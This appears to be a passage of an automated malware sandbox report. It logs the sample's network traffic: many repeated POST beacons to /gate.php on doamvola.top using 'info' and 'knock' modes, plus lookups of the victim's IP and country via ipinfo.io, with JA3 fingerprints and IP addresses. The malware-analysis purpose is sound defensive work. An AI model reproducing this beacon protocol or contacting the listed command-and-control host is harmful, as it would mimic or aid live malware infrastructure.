Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top

May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: Joe Sandbox View IP Address: 216.239.34.21
Source: Joe Sandbox View IP Address: 151.101.0.133
Source: Joe Sandbox View IP Address: 216.239.38.21
Source: Joe Sandbox View ASN Name: SELECTELRU
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: Joe Sandbox View ASN Name: FASTLYUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic
HTTP traffic detected: GET /ip HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ipinfo.io

Source: global traffic
HTTP traffic detected: GET /country HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ipinfo.io
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
